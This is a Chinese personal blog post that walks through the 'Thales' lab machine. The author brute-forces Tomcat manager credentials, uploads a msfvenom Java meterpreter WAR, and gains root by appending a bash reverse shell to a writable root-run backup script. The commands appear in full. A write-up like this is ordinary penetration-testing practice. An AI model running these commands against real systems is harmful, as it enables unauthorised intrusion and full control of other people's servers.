noone___'s blog
0%

学长的任务罢了3-Thales

发表于 分类于
手快直接提到root了啊嗯

  • 扫描打点

    8080tomcat 9.0.52

    必应搜 msf tomcat扫描 第一篇就叫你用 msf 爆破账密:

    msftomcat,用这个:

    爆破出账密:

    tomcat:role1

  • tomcat 后台传 shell

    登录进去,服务器状态-应用程序列表找到可以文件上传的地方:

    查了一下生成 .war 不能用 linux/x86/... 那一套,要用 java 生成

    msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=443 -f war -o java_443.war

  • Linux 提权(一步到位了)

    去当前用户的目录下找到 notes.txt ,这个地方没看 user.txt (如果看了就会发现没权限)导致忘记先提权到 thales

    看到这个可读可写,且有 root 权限

    那就直接加一段反弹 shell 进去:

    echo "bash -c 'bash -i >& /dev/tcp/192.168.56.101/1234 0>&1'" >> /usr/local/bin/backup.sh

    静置一段时间等回连就行

    翻了翻 wp 好像错过先提权到 thales 了(逃